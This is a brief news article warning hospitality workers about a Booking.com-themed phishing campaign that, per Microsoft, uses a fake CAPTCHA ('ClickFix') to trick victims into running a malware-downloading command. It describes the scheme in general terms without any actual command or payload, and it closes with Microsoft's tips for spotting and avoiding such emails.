Beware of this phishing scam posing as Booking.com.

Hospitality workers should be cautious if they find an email in their inbox that supposedly comes from Booking.com and presents itself as a message from an angry guest, as it could be part of a phishing scam. Microsoft has warned about an ongoing phishing campaign that sends fraudulent emails from Booking.com, aimed at tricking users into downloading malicious software.

In a statement, Microsoft Threat Intelligence highlighted that this campaign has been active since December of the previous year and utilizes a social engineering technique known as ClickFix. The emails that reach the victims may vary in content, ranging from guest complaints to inquiries from potential customers or account verifications, and include a link or a PDF attachment with a link that appears to direct the user to Booking.com to resolve the issue.

By clicking on the link, users are taken to a screen that simulates a CAPTCHA overlaid on the Booking.com page. However, this CAPTCHA actually instructs the user to open Windows Run and copy a command that downloads malware onto their system. Once the malware has been installed, it can steal financial information and credentials, aligning with a technique used in previous phishing campaigns by a group identified as Storm-1865.

Although phishing scams are quite common today, this version is particularly sophisticated, exploiting hospitality workers' concerns about customer satisfaction. To protect themselves from phishing attempts like this, Microsoft advises users to check the sender's address in the email, be cautious with messages about urgent threats, and hover over links to view the full URL before clicking on them. When in doubt, it is recommended to access the service provider directly, such as Booking.com, instead of clicking on a link.